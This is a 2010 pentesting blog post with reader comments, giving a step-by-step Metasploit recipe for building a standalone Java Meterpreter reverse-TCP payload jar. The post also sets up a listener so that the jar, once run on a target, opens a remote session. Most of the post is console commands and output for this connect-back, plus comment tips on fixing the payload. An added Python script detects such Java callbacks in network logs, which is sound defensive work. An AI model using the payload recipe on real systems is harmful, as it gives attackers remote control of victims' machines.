0x0e.org | pentesting perspective

braindump on pentesting, QA, metasploit, constant learning

Metasploit HowTo: Standalone Java Meterpreter Connect-Back

with 5 comments

Here are some quick notes on how to create a connect-back Java Meterpreter .jar file. The process is very straightforward: generate the .jar, set up a handler, then move the .jar to your target and execute it.

Note! Nightranger’s method to do this is currently out of date (10/17/2010).

Following mihi’s instructions, create the payload:

msf exploit(java_signed_applet) > use test/java_tester
msf exploit(java_tester) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_tester) > set LHOST 10.0.0.11
msf exploit(java_tester) > set LPORT 4444
msf exploit(java_tester) > exploit
[*] Started reverse handler on 10.0.0.11:4444
[*] Sending stage (26938 bytes) to 10.0.0.11
[*] Meterpreter session 1 opened (10.0.0.11:4444 -> 10.0.0.11:60519) at 2010-10-17 17:50:29 -0500
^C
[*] Exploit completed, but no session was created.
msf exploit(java_tester) > [*] Meterpreter session 1 closed.  Reason: Died
msf exploit(java_tester) > ls
payload.jar

Now, set up the handler:

msf exploit(java_tester) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.0.11
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

Copy the payload to the target and run it, and you’re golden. No need to fiddle with the classpath or anything; the loader jar is self-contained.
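From the defender’s side, what the steps above produce is a Java runtime opening an outbound TCP session to the handler’s LHOST:LPORT (10.0.0.11:4444 in the transcript). The following is an added example, not code from the post or from Metasploit: a small triage script over constructed Sysmon-style network-connection records that flags java/javaw processes connecting out to ports outside a per-environment allowlist. The record format, the allowlist and all sample values are assumptions for the example.

```python
import re

# Constructed sample records in a Sysmon-like "network connection" shape.
# These are made up for the example; they are not log lines from the post.
SAMPLE_EVENTS = [
    "2010-10-17 17:50:29 host=lab-xp image=C:\\Program Files\\Java\\jre6\\bin\\java.exe dst=10.0.0.11 dport=4444 proto=tcp",
    "2010-10-17 17:51:02 host=lab-xp image=C:\\Program Files\\Java\\jre6\\bin\\javaw.exe dst=203.0.113.8 dport=443 proto=tcp",
    "2010-10-17 17:51:10 host=lab-7 image=C:\\Windows\\System32\\svchost.exe dst=10.0.0.11 dport=4444 proto=tcp",
    "2010-10-17 17:52:30 host=lab-7 image=/usr/bin/java dst=10.0.0.11 dport=4444 proto=tcp",
]

# Assumed record layout: "<date> <time> host=... image=... dst=... dport=... proto=..."
EVENT_RE = re.compile(
    r"(?P<ts>\S+ \S+) host=(?P<host>\S+) image=(?P<image>.+?) dst=(?P<dst>\S+) "
    r"dport=(?P<dport>\d+) proto=(?P<proto>\S+)$"
)

JAVA_IMAGES = ("java", "java.exe", "javaw.exe")
ALLOWED_PORTS = {80, 443}  # assumption: normal Java egress in this lab is web traffic only


def parse_event(line):
    """Parse one record into a dict, or return None for lines that do not match."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["dport"] = int(ev["dport"])
    return ev


def is_java_image(image):
    """True if the process image is a Java launcher, on Windows or Unix paths."""
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name in JAVA_IMAGES


def flag_java_connect_backs(lines, allowed_ports=ALLOWED_PORTS):
    """Return events where a Java runtime opens outbound TCP to a non-allowlisted port."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or ev["proto"] != "tcp":
            continue
        if is_java_image(ev["image"]) and ev["dport"] not in allowed_ports:
            hits.append(ev)
    return hits


if __name__ == "__main__":
    for ev in flag_java_connect_backs(SAMPLE_EVENTS):
        print(f"{ev['ts']} {ev['host']}: {ev['image']} -> {ev['dst']}:{ev['dport']}")
```

The svchost.exe record to the same port is deliberately left unflagged: this rule keys on the Java runtime as the connecting process, so it should sit beside a port-based rule rather than replace one.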


Written by jcran

October 17, 2010 at 11:41 PM

Posted in howto, metasploit

5 Responses


  1. Eventually you’ll be able to build the jar with msfpayload or by using the payload in msfconsole.

    egypt

    October 19, 2010 at 2:59 AM

  2. I tried it with Win 7 & Win XP targets, with new Java and with one a year old, it never completes, just hangs at “Sending stage (749056 bytes) to 192.168.1.81”.

    I can use the Adobe Cooltype exploit but the JAR one doesn’t work. I am using BackTrack 4 in VMware Workstation.

    Sam Bowne

    October 22, 2010 at 4:54 PM

    • make sure to use the java/meterpreter/reverse_tcp payload, and not windows/meterpreter/reverse_tcp

      jcran

      October 22, 2010 at 11:39 PM

  3. […] Metasploit HowTo: Standalone Java Meterpreter Connect-Back – 0x0e.org The process is very straightforward, simply generate the .jar, setup a handler. […]

  4. note: test modules need to be loaded in now:

    msf exploit(psexec) > loadpath /home/jcran/framework/test/modules

    jcran

    December 16, 2010 at 8:05 PM

